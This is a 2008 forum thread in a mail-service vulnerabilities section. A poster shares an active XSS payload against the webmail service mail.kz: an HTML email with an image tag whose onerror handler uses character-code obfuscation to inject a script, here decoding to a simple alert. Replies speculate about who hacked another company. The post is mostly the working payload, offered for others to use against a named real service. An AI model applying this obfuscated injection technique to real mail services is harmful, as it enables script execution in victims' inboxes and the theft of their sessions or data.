mail.kz [Active XSS]

Discussion in 'Mail Service Vulnerabilities' started by slider, 25 Mar 2008.

  1. slider

    Maybe this will be useful to someone....

    We send an email in HTML format with the following content:

    HTML:
    <image src="" onerror=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,115,108,105,100,101,114,34,41,60,47,115,99,114,105,112,116,62))>
    in the char codes:
    HTML:
    60,115,99,114,105,112,116,62,97,108,101,114,116,
    40,34,115,108,105,100,101,114,34,41,60,47,115,99,114,105,112,116,62
    is the following:
    HTML:
    <script>alert("slider")</script>
     
    #1 slider, 25 Mar 2008
    Last edited: 25 Mar 2008
    7 people like this.
  2. W!z@rD

    This brings to mind the "scandal" with Nursat, was that your doing? =\
     
  3. NFM

    It wasn't his doing, чатти2 hacked Nursat
     
  4. W!z@rD

    Who said that?
     
  5. NFM

    I said that =)